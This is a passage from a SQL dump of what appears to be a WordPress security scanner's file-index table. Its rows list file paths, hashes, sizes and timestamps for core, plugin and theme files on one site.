ublic_html/wp-admin/includes/media.php',1,'69171c4eac8d9f3d85c24885544eb62f442c4fae6f1e1aca27a9ec462790743a','09e75628233d83e9ed309e9b98f8a33f','',0,116957,33188,1,1624521017,'',''),(1629897503,1,0,0,0,0,'1db0c6062defe3224613d01198e4519dda9185c7','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/template-library/classes/class-import-images.php',2,'8b4280de3d2caecbcd8c23583a93e52dc036711180b39f2d2b6a04d33a609c64','12a5d71d3caa5809c138516ce51a3cf7','',0,4423,33188,1,1627570493,'',''),(1629897503,1,0,0,0,0,'1dd32de3852953bc00a604ba26de0247b1a54a16','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-block-type-registry.php',1,'83e83b1c240b183b9029bf16061d2451000875927d20169597ba936593f05a9f','7252844d143896fd753c8356ca6c91a1','',0,4685,33188,1,1624521001,'',''),(1629897503,1,0,0,0,0,'1e02bf8a6b7acdf8a8eace632b7296839368b6c5','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php',1,'7231107941cdf41a5731709533d444ecf02536bdb9a0d27bbdba369343527f4c','5e9e22083352309ac61da701bbe50fb9','',0,2711,33188,1,1624521008,'',''),(1629897503,1,0,0,0,0,'1e0f9c31c5471d49a52df7508d42dbcfd8923e44','/home/westonspirit.org.uk/public_html/wp-admin/update-core.php',1,'4e2b6eef21dd701ce06f45e6ca68c3e2a87eeb2ce62d48f7695f057a15248281','2ddb5608674ee7a03782edf83f3a5ec6','',0,43589,33188,1,1624521013,'',''),(1629897503,1,0,0,0,0,'1e7b78f814014b43be6d9ede0b56d83a0a371d26','/home/westonspirit.org.uk/public_html/wp-admin/edit-link-form.php',1,'917fbf21c17e6db9065e4aead2f0c04c225dc65c9f310164eda3b9459d70bf98','a453be8a045a6571f669cb5bd5c30d76','',0,6299,33188,1,1624521014,'',''),(1629897503,1,0,0,0,0,'1e80578f82a1e95fb702dd0186675a2818756ab5','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-user-query.php',1,'8716d9b072020baa367f6a26d80e581c2fa503da02e263e89ee214ad2fbecbe4','541bc44979cab0af427a52acb43ecb4f','',0,31333,33188,1,1624520999,'',''),(1629897503,1,0,0,0,0,'1e8d84e06c90d73e904548ac7952987fdee9a714','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/maintenance.php',2,'b1d531f9c2723a27be18303334136ddb441fb5dc86bcc2e51bd9eeb703048cbb','3296f68e4d81be0468db944c52f610cf','',0,2146,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'1e96ea00c7c964faba5df0d782e50bd44e2c671f','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/progress.php',2,'a92bcdcf9a1354860484a6c114ba85659319a8886a44718eab38b98a695e8bb8','4dcb1e3f8df60a019b54789f132f24b5','',0,10031,33188,1,1627570493,'',''),(1629897503,1,0,0,0,0,'1eb07e58d778adb2ec0eb08422f6615cbc395168','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/kit-library/data/repository.php',2,'72bace73c624aa1bb7c4fb21cbde02326eac04df079c0dddba26f1835f1f266c','1f98fb96670111de862e50c13b7f8997','',0,7434,33188,1,1627570490,'',''),(1629897503,1,0,0,0,0,'1eee9b7d7b833d577f24d178b89a2d2ea754e020','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/vendors/widget-helper/class-widget-helper.php',3,'c4550f62fda5add0c8505dbcf6365551a008997ca99b8f31e04b008e674c396b','2a19064b1364967d67ebf46bda9f2c50','',0,12924,33188,1,1629806209,'',''),(1629897503,1,0,0,0,0,'1f01dea7014ceedc4706ed9576941802ceb8dda3','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-nav-menu-control.php',1,'ba8fa912e91c7711a57db07f6ede7fa8a3599b4bf52e9c72d16b5e511820e777','f30b40567b05522338ba376ef36e0a9a','',0,2068,33188,1,1624521006,'',''),(1629897503,1,0,0,0,0,'1f2c542a60bee4302bc63683b202b4f994aa6f8b','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/editor/editor.php',2,'6b8cefba4c3f4c9e863341b3fad0aace90c0220f5d750307421bc1dd83e37125','fb56535ba48a438b82c56037e63d7a97','',0,24535,33188,1,1627570490,'',''),(1629897503,1,0,0,0,0,'1f4e60aa4394bcca30a9e00ba3bc68be4b776f1c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_scanner_credentials.php',2,'63aa596f356fd9561015186e5cbf2f03fa98e80223e652ae380bb110418c1d22','7d9d9fcc0c970094bab11a0eccccbfd4','',0,2767,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'1f5a156747bb72924ab7fd6213eb681865b31dcf','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php',2,'931c1ff77eb4d96452f02e79184367d3390ddd47ad47f944ab65379f8adb7971','069b34b902562b143d3f6bc50db2e1cc','',0,105517,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'1f83230ca0e6ad7c95997615337a9395609c3e34','/home/westonspirit.org.uk/public_html/wp-includes/theme-compat/comments.php',1,'0383b5611f112e9ec8537a6f9df9352872a4027e721ab2bf2f370f81557db5c5','ade2cfaadc2dd459da44c18a73b79108','',0,2145,33188,1,1624521002,'',''),(1629897503,1,0,0,0,0,'1f8655dd203989dc6fe20c2fb6ebbf30173f0594','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-text-diff-renderer-inline.php',1,'2bd53c5c76196dc7da246443f2fee8dd7a388555b64cd97c585cd8db2f579edc','e8053813b36cb4b25f0deeb275ff8ca9','',0,716,33188,1,1624521000,'',''),(1629897503,1,0,0,0,0,'1fc9e2a406e673dd4ded54ee449dfbe80217fd30','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/inc/customizer/theme-option.php',3,'1a611514918d9dc92b563d333fa2d30bff65e4854d7b01a204bdd82f6e039394','248dccf2fb23a07372eadc3ce359e865','',0,7778,33188,1,1629806208,'',''),(1629897503,1,0,0,0,0,'204258e2bde07d620123d17b983556fd6d0cb96c','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-controller.php',1,'8014c9d5e828cca81c08173e527668d132e412139429c3d03f4fb9e07b766a24','029471cd8accd5c7d3fb7446f5f59fa5','',0,18421,33188,1,1624521008,'',''),(1629897503,1,0,0,0,0,'20810edf650db8cf4804dd1f0795b376e396cd2f','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/kit-library/data/kits/controller.php',2,'97070324f84f41e56dd09e2896e9a25b2ad66e725e4eba40959daf48f98d776a','11b5d6eaa7d78170590935dffd59ad3f','',0,2092,33188,1,1627570490,'',''),(1629897503,1,0,0,0,0,'208d2bb5944f31596720d117e480b8ed9bb6ee3e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/model/request.php',2,'ceb86c3755d53c6959154c848c6ff14048756e9e282351ff23da6d5b62c80d29','26dcae4daa1cf78b2c7e2fe21cf8e972','',0,5893,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'21402298b313c688159591359d6f0c977d7570cc','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/template-parts/content/content.php',3,'ee01b29aef303591fc787cfeb570b228a48e935d1f94670d1badf55ff7b088fc','760a715910c4b86070ac03d0f2160385','',0,1465,33188,1,1619440190,'',''),(1629897503,1,0,0,0,0,'219ed38e50370f70587a9d38262a49886a837612','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/header.php',3,'ce2ef4a28ba54e77036a79eec52e770aeb8cdc7fb3dae2cdec11646b8cdcde6f','46bae1a53876eb449ce5170f1906dcc2','',0,1884,33188,1,1619440190,'',''),(1629897503,1,0,0,0,0,'21a8777f0306925ea50aaa6b7093aaa1f898dd51','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/lib/php72compat.php',1,'abb1bd865bdf0d4feeff0e8a57fa8f4fa381419a867335050f8aef6eb9078066','4147d21acba23b80b9c2f9aead8c896c','',0,41569,33188,1,1624521008,'',''),(1629897503,1,0,0,0,0,'21c01ff04badc68903d67d55702f0f9b569319ac','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/407.php',1,'dea9561974cd6845f65c49a85f68360ed3376ad50dfa3d59a6afdba8e56d1785','c2c817e9f5d8768bbde4d66a26e6c6b5','',0,441,33188,1,1624521003,'',''),(1629897503,1,0,0,0,0,'21e0f0af4e999281cfcc2d61af0bb44ccebc4f6e','/home/westonspirit.org.uk/public_html/wp-includes/theme-compat/embed.php',1,'72ec50a9ac5aeb7f5073672b2fb7c08c1926051f85a330fc49fa49446c219d39','c805c5a273be5ed0f4bb71a20f6362ff','',0,481,33188,1,1624521002,'',''),(1629897503,1,0,0,0,0,'21e8660e40a01c4f7213e546062bdb75b1fc072b','/home/westonspirit.org.uk/public_html/wp-admin/admin-footer.php',1,'0cdab6360e782edb52bdad453c5954fe34c05f2513c5de6e3d6a5eb823d87528','b8df52b4b623d674740549727a58924b','',0,2832,33188,1,1624521014,'',''),(1629897503,1,0,0,0,0,'21ed3fa513cb5e7833f6e94140c10a31b2d766dc','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-acct-activity.php',2,'663bdf4c98a1c3e7712ffba0d3311dc75b054bbb225873be38ff223f6ac90171','aa1d487ca1ef77631843a63612f1ca95','',0,8632,33188,1,1625053880,'',''),(1629897503,1,0,0,0,0,'21f26352ecae2422fe22c4fd35fa74d5262a13cf','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php',2,'e055dd801cc21f8b47f620f594089daa0de578abed64fe13e5d62bb05b775d9a','3e2a4cd6311ecacbb5a9226b2546832b','',0,5356,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'2203e30c5f1019f2d4b3b3a38c5741dbb5ed3b44','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/managers/image.php',2,'f5d853157c8a685575999fd8f7f19bdc76182d796078fcfb21053be9a134c9b1','78e71432f88ab653373c97977aa5f051','',0,3709,33188,1,1627570493,'',''),(1629897503,1,0,0,0,0,'2230aedb1f43a995055dffde37a4ec3f7188532f','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-media.php',1,'6f5730d7bdc64a2fdb87cd36fba3087aa35f3f6b3500ada58d04bd55ba5e2d70','a16da7a9b3a9974f02e5dfcf5cb0dfc1','',0,14061,33188,1,1624521006,'',''),(1629897503,1,0,0,0,0,'223bdfc54b6acbc64e84bb61a31dd9018284c276','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/general/wp-security-list-table.php',2,'6be7c7662000326f041e384f0cb46aa8358b493bed851446505dc36adbb693eb','50b6a0343fc28e4ecff350c9b4c65fe9','',0,38293,33188,1,1625053880,'',''),(1629897503,1,0,0,0,0,'226116524ea15f123a2ccad211af3291d2cc2efb','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/inc/template-tags.php',3,'642bdc22622cb3d1413d18f24a90266284322fba62f2779a101b019db7b958e4','76d26e759fa1b806472d74be0aec31e8','',0,7790,33188,1,1619440191,'',''),(1629897503,1,0,0,0,0,'226757c176a4c877e15c50bb459867c7f661f2a8','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-block.php',1,'9bb53ef90664b9a8fec74161267976533be9971b63ca71a572d56410ac5d41ec','f8dd95a7e846d4af92381f668b36e8cc','',0,6765,33188,1,1624521001,'',''),(1629897503,1,0,0,0,0,'227526aad2deccc7f2bdb7532877a745718549f5','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfDict.php',2,'124b43cc4763f9214f4ab10cd4737a535e89cfd22718d4fa457c864a4b6412eb','79df204c07fceaef5a216245b1d46cda','',0,738,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'2293ab9dd444a67ae9a6c632ecb4386f417d2c40','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/archive.php',3,'b88bf6adeedbaa5ff27cd1dc5d6b39828e409ec1998bd3fc985b9cef251e2e0c','c984f274cfe33bb25ac1f012ec9b9770','',0,2347,33188,1,1629806208,'',''),(1629897503,1,0,0,0,0,'22a61376b3aa12a1bd424626f32dda6cd85690fd','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php',2,'52e3acb78da235d110383042127900fc5a539a987a68049c5e283192b258781d','e52014c24f0bd99143488cd89673ba20','',0,6064,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'22e0b97642ab13c7df6d693d27c3ac7b41f6b7cc','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/Int32.php',1,'58a247a420332fadca21cee9e859b12642de333d122a41643a9e1795bf8ab2fb','bbb333b70e7fa24e4d5bdc2fe00d7e48','',0,24542,33188,1,1624521006,'',''),(1629897503,1,0,0,0,0,'22ee27aff898c25632d8ef89919d27e10f65be41','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/inc/customizer/core/control.php',3,'3b8c21021bcd54a47d8c58003b1ebe33c58f239d19b3d60b449300792f517083','c0cee64d222b43761217c5d7bafd2ff1','',0,3577,33188,1,1629806208,'',''),(1629897503,1,0,0,0,0,'22f940ba90981310f927c365aa7f5f450d320813','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php',2,'56b4e3e5de804375f0f315d5b99b72854669e0f3c993256ff8848aae5185fbe8','bcfc142a4d5d596e4d04245ec3b922b7','',0,54869,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'22fc14f7c0f2624cd9274e64f53773b18548ba6a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/admin/feedback.php',2,'041ec12ac69b2e886d68ee9204f63c9d24c22b621b9e1a5b7a0ec6de4280d4ce','5cc9e93e2f0fdc9318f8f4a8a2f9196e','',0,5991,33188,1,1627570489,'',''),(1629897503,1,0,0,0,0,'23783445c2395a6ff0deeb9084d5d301dbae9eb5','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php',2,'ae279f8830c2c3aa73197574830b0c09e15d83aa386139362fcc11cd7751ca30','cb6276419d6e07f161f7c931204383a9','',0,1184,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'2389bd5505f159a42466650fbdc5d8a5fba8c961','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-http-proxy.php',1,'d00dfe3d7325ba760b72ff6bd40be9a9d5214099ff3328c752cbd7a549305cf1','401f552cd73af7ee2d3c498e6517bada','',0,5863,33188,1,1624521001,'',''),(1629897503,1,0,0,0,0,'238b5b9e4d9ab23225fcc8133f1ac5398dcccdb8','/home/westonspirit.org.uk/public_html/wp-includes/ID3/module.audio.flac.php',1,'837fa2bee9b708d48b7099d37c21fd56fa6db00b70c7499bcb89a8e3f0d0955b','eeeaa52dd3d79ce0a02f6683dc548740','',0,19669,33188,1,1624521005,'',''),(1629897503,1,0,0,0,0,'23947b4f7cfa48a499e9be4a7830bc4f6e0f21af','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/import-export/compatibility/base-adapter.php',2,'8ea9feaa678ba08bdda619048897928cdee44e44aa7adeb84a347721146a054d','93b75fa38967cd9973fb979a943ef1af','',0,719,33188,1,1627570489,'',''),(1629897503,1,0,0,0,0,'23a18cb2893e41fb0cea94f19497bda32c9dd642','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/admin/notices/base-notice.php',2,'661b44dbda366cfec01376fb8a25797ef0312ad2171a401572732c1076d7cf0e','4c6093f734cfae2d643f37c7f5fe7fc3','',0,515,33188,1,1627570489,'',''),(1629897503,1,0,0,0,0,'23bbe9f4d8b32bcd29118213f0144e81b7b8e590','/home/westonspirit.org.uk/public_html/wp-admin/authorize-application.php',1,'9489792f69c86c94a8452e6c80a070bd00f35f6355fb21afc0c2522acc91d668','988b784f8213e2f6c4de243aded8672d','',0,9850,33188,1,1624521014,'',''),(1629897503,1,0,0,0,0,'242eae7416e4203ff88e13ed74ddab2cad1f97c8','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-list-util.php',1,'18535c538b348b2119a6fa7e87f54b4afbbaa87ac203e12de0f1c519110a7321','cc7d980c20fbb553d395766c871e5440','',0,6615,33188,1,1624521000,'',''),(1629897503,1,0,0,0,0,'246fb61a20786716ce1a837e600d629847811d08','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/index.php',3,'3a7c66cd5ad6d571ec68ff71dc60765cdcbb269645576f353efff4f8e84c8c12','7fec08c6f4a6d5b026b81d9d5467730d','',0,1066,33188,1,1619440189,'',''),(1629897503,1,0,0,0,0,'24bc1b1c6e5efdcf1164881e1ca55b226189af16','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/groups/text-shadow.php',2,'099b28696f6d4dd6608f4b2fb70c3a20ac216ba5a5a02e18620e9322cd483ef4','023af0a692d7f996576bf3d046378a11','',0,1960,33188,1,1627570493,'',''),(1629897503,1,0,0,0,0,'24e5dd6a0daef3109dfb59114a3cca12003c237c','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Item.php',1,'b0d04ab89fa08e9a3f2d10e01b57ba03cf8daea22284e20c098595b52d1e483c','2ddf9f898a099b3884a5858831c81656','',0,99078,33188,1,1624521002,'',''),(1629897503,1,0,0,0,0,'2504169043ce8a1b8cbcb9402a58675b8a67bff1','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfDateLocalization.php',2,'948fabc90460881257f7c60d8f1c988222f2b6d5a6fe9bd92f71d7552d68be79','eb34844b5f4afa32436d63cdadc774dd','',0,360622,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'25279043b7d8b80647f4969e0669f85d2a39a8fe','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-spam-menu.php',2,'31fe55c5c975322ed8cb27b2cb02ae549fcf1de79e57ed09e7e914275e49fe44','c903dbb4694eb314df6646c93d7701ac','',0,33651,33188,1,1625053880,'',''),(1629897503,1,0,0,0,0,'252cb53d8efe5943412942700eeb8f469582aae1','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php',1,'b6a0242137005236e4af3e22421e18d4742f25247a1c02d07f9c4250d089cf0a','94ecd6f6614508520e3e3630932e2948','',0,27378,33188,1,1624521006,'',''),(1629897503,1,0,0,0,0,'2568823b28650d2769b73d9ed5588b4ed807270c','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/button.php',2,'175f88551e2d2625a5b093cbefb1b3fbf7d9a81f9cdeb367b37292da283e8564','e920b15a1bbbc8361271e7f499240b6d','',0,14424,33188,1,1627570493,'',''),(1629897503,1,0,0,0,0,'257ea1f2657ae6fa8c683d7ac112916b8b5b7c2d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php',2,'d7c6ffab5eb80056bc3c8a931ad89a1d8c91457440216387c9b4940143cd94d7','4911c368851583ae25752d17439d00c4','',0,938,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'2584a1bda501a6240434a63711a453a5ac288bb1','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-date-time-control.php',1,'d859be1954ea9b35ea36f0f5a8614da7a757f01b8737637eaaa7d2e9286478dc','2886f49a6368d44c88a946fc07339062','',0,8729,33188,1,1624521006,'',''),(1629897503,1,0,0,0,0,'259ab5af264b6b45ae2eca753da7f9928131236f','/home/westonspirit.org.uk/public_html/wp-includes/category-template.php',1,'c8115342a8382aabfdf81a2689479f964d68b55dfaaf9a93b40b0acbdefb0b12','4bb696a7e31d8cc267a96d16db3d3507','',0,55563,33188,1,1624521000,'',''),(1629897503,1,0,0,0,0,'25c90756d04d092f3346a9a596222d7814601cd2','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/tmp/.htaccess',2,'9441d86ae54548d662ba1afc4b44b38cd76adafb5e893cf8667a815f48079d64','b749a07a7ed269b62c1b4c9effe81e04','',0,15,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'25d8040c4099f7ae12d2bf83cc587c20dc6f6920','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/raw-html.php',2,'1bd8cfe14fbd3f40e0c7e27f5c865c77d4ac24b958ca1b5d0748c19683515eac','6c8fa918f3541e97e6c86a24fe160c6d','',0,1519,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'25db063d3a569a5e652fc8860823fd4f200c73cf','/home/westonspirit.org.uk/public_html/wp-includes/rewrite.php',1,'9d28c835e0705926be6d11669386ba68acc2aaef036cc4fd84d434408bcce397','3700423622c9088fc296b13781dd5892','',0,19213,33188,1,1624521000,'',''),(1629897503,1,0,0,0,0,'2607b244c410c1749b3dd606918cd6785ce189b4','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php',2,'01f587840c463f49a2049af2f13f3b6a1904a7ac5b19748c10393beacaf2b6f2','16addc917a8c673c4ee8f40a3f6f3666','',0,1645,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'2621f287e851689a0b4f5eaefc83e0bcd0bdd9b0','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/cerber-lab.php',2,'bc6627725b58fb340f3665cfd525bd802ee7d27f17bd57c4ff288184819150b6','9bdfa330eb53c382f9b09d377eaf3a41','',0,28459,33188,1,1625053873,'',''),(1629897503,1,0,0,0,0,'263597ce29debcf972da808ece604482ddf247dd','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/Curve25519/H.php',1,'da68a2f81fb692899cef060ba7cb75152de2a0db720862b8980e06b8e5d4a7e3','d0c4831364a9ea4fc45bc7530a631c00','',0,108755,33188,1,1624521007,'',''),(1629897503,1,0,0,0,0,'2642dfe30c91f06d39a8576927aebfdb1e229d42','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'28080eba6fa5689e36b6e2729e516487c5a796d22697b5bddab7a1832dd9671f','7d2b237a2caf04e865df0672454a192d','',0,120,33188,1,1624521008,'',''),(1629897503,1,0,0,0,0,'265b333cb8022a7412ca2c0399cb3d0b816d165c','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/view.php',2,'3fc594b491fc3dd4b935e233daf80d92c2e1be35d4c5860870579df178bb3702','6fee136d7e76caf0ede756e88e528164','',0,662,33188,1,1627570489,'',''),(1629897503,1,0,0,0,0,'2662010b3f083064a3c027dad7f893bf2db24993','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/inc/custom-css.php',3,'6a97f72ad2b5fe5796307aaf5e5f71718f3bed9fc80b1ea1fd1ae1c04dd1e394','528081cde1b8d56bfa64c990ca8e0473','',0,1182,33188,1,1619440191,'',''),(1629897503,1,0,0,0,0,'2679407c01ac252ce8719a89fbbb69f79f385076','/home/westonspirit.org.uk/public_html/wp-includes/sitemaps.php',1,'84052534828ffa92f22b4f8cbed9342a48b8f158561bc07ddfcb0ca099b1a2cd','6747f6784ec7298a2fb3f4a7bd02c92a','',0,3236,33188,1,1624521000,'',''),(1629897503,1,0,0,0,0,'272ead1bf4ec94d1f9215e2eb934b2ad100a85e4','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php',1,'cf3e7db368bd91f2b13823d393b2019c83eaddc8934cfcb83e85761740ab1699','018a214be50e091e357910bca181532a','',0,112,33188,1,1624521007,'',''),(1629897503,1,0,0,0,0,'272f88ec8f4d8fb0a1c28ebe3d1aea59275dbc03','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/utils/version.php',2,'a8c6f3cee04be185c67d220621f7dc43dad96491d4168dae5af4af9bac01d747','5ea38a88e9cf6f117a4dce867cc788cc','',0,3721,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'273e846b4b95eddfaa03a302cb651547d06e8244','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/unsupported-php/admin-message.php',2,'66ec09976f8afebdad43f3116bd2433ea089a6b4ecb4de791f35a3065169c776','f21f2860aaf7484d44bfb941bb37ca39','',0,838,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'2748aa2fa6136dad70fa88212369f314962ff63e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_firewall_waf.php',2,'f9204fa84619ab3d25c8b1082fad89a4112d0bc71c61e19481d6b1c9cb6672fd','b8d229565515034c90b7435fb05638de','',0,20262,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'2748efa7906cf4e4e784887e3885b8d206fa279d','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-recovery-mode-key-service.php',1,'8ff205d6cd87cfaecde28664fe18aa230afecb8f569bf33933c3e3a31c0559e6','b4394185a86c0186cce925113c0b9743','',0,4270,33188,1,1624521000,'',''),(1629897503,1,0,0,0,0,'27559f66969f0f1fc7a55f8a62126e138c6248ba','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-custom-colors.php',3,'23bbdf0432981629bd099f370852e88c793eaf6975f017913f9ee9b2d5e07452','f0cd5557086e3a73d27a6b5d556098d6','',0,5273,33188,1,1619440191,'',''),(1629897503,1,0,0,0,0,'27752ce5b62e98dd8afda5fff78965f1562e4863','/home/westonspirit.org.uk/public_html/wp-includes/feed-rss.php',1,'dac5014f327da3f8dea8ea61bcecc47318c0752df72872ee5b8bb1cc1c9e4496','694aad3f59437f963e5e91ee661d05b8','',0,1189,33188,1,1624521000,'',''),(1629897503,1,0,0,0,0,'27f96e81cecb4050f8a70822a52852ba37e35689','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php',2,'be497fc51fc737ca00d937d1926ba70a1d6d2ac71eeb978f960496aea7e78158','d8cae603cdc15a7a9a23190748e8e7b2','',0,11565,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'281ba95c9216c526e73bee0e19ed57df2090ff27','/home/westonspirit.org.uk/public_html/wp-admin/admin-ajax.php',1,'91392b0bfa15da3a0ff06273d0dc891f85b33d73f09bcc187b94e36156ddb6dc','156dca49797396866a8579a5ecd1a85f','',0,4948,33188,1,1624521014,'',''),(1629897503,1,0,0,0,0,'28523ead93cb2f5d6174a70c7f54487181cc0aaf','/home/westonspirit.org.uk/public_html/wp-admin/revision.php',1,'b78234708488a8029cad795b9a8f043428f6f72cac568847d8265e07488b009d','27f455ef0fc23a23b22b0661b494ec46','',0,5533,33188,1,1624521013,'',''),(1629897503,1,0,0,0,0,'286ba7a184da95677e013f0a4f992d852b5982b9','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/onboarding/banner.php',2,'6257b50c60d91e40549bf89125b3219e089808e4dcd50c16bdc94e27c842c5f5','f87a7aa9237576e5129900179b18bfac','',0,468,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'28765171967409d71cf1349886fd320e58c9adcd','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-knownfile.php',2,'0b661576f876bf3dba0e437fe7a861996390dcb3232af375cea67f9d0e133011','cd475e3db2708a3d24f719a71af1ae32','',0,2823,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'28778c897b036a7f3d12577dd8ff225036bb466e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',2,'2e13a6fd06d231539bb172d5fd1423ce5257128c7aea867414fef1daa8505061','204f700c527b01fcd2b58ce747dd8ddb','',0,179,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'287a15e0cf07bedc2830c1a9f6b7d1b4220e31dc','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/library/traits/library.php',2,'1a1a7a50f889a6c21fef0afbbd0601848a8902668c40f4d96ae3ee19f12872dd','c42100fac3905412d9879e13f8359ce9','',0,948,33188,1,1627570494,'',''),(1629897503,1,0,0,0,0,'288292ad4d93db33a5d69c40615adb2a819d7e6c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php',2,'be152b43a1d2fb7db898eee59bea69798be332276aef1cff566a8b6dd9141705','1c28af2c83a094beaf45da8ee6860e3b','',0,1044,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'28cb738ed7a89cb969dfe06c530e2e609cb9bcd0','/home/westonspirit.org.uk/public_html/wp-includes/Requests/SSL.php',1,'bc0323cd7ee0032f6afb0de325721783e8c7aec8d5946144848b5c7b92ae4b22','ab8f194bf3a90fbc1899fbe8cbf39fef','',0,4023,33188,1,1624521003,'',''),(1629897503,1,0,0,0,0,'28f5a21cb1d2e3d4b5b899951521d593ab3b0ab1','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php',2,'9530337bf79f8a788de9960fa76e63e21dc073071bb3ba773cd6c2efe8096671','f34d23c6822c886e9ac8cc6a397ba299','',0,1573,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'293ed013cbcbc7bd8be4e7f5d1e7fd4710e2f4b0','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php',1